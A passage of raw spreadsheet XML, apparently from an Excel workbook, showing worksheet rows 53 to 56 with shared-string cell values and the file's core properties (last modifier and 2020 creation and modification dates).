      <c r="C53" s="1" t="s">
        <v>133</v>
      </c>
      <c r="D53" s="2"/>
    </row>
    <row r="54" spans="1:5" ht="16" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A54">
        <v>57</v>
      </c>
      <c r="B54" t="s">
        <v>69</v>
      </c>
      <c r="C54" t="s">
        <v>69</v>
      </c>
      <c r="D54" s="2"/>
    </row>
    <row r="55" spans="1:5" ht="16" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A55">
        <v>79</v>
      </c>
      <c r="B55" t="s">
        <v>67</v>
      </c>
      <c r="C55" t="s">
        <v>67</v>
      </c>
      <c r="D55" s="2"/>
    </row>
    <row r="56" spans="1:5" ht="16" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A56">
        <v>80</v>
      </c>
      <c r="B56" t="s">
        <v>68</v>
      </c>
      <c r="C56" t="s">
        <v>68</v>
      </c>
      <c r="D56" s="2"/>
    </row>
    <row r="57" spans="1:5" ht="16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Bob Fornal</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-27T15:08:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-27T16:51:48Z</dcterms:modified>
</cp:coreProperties>
</file>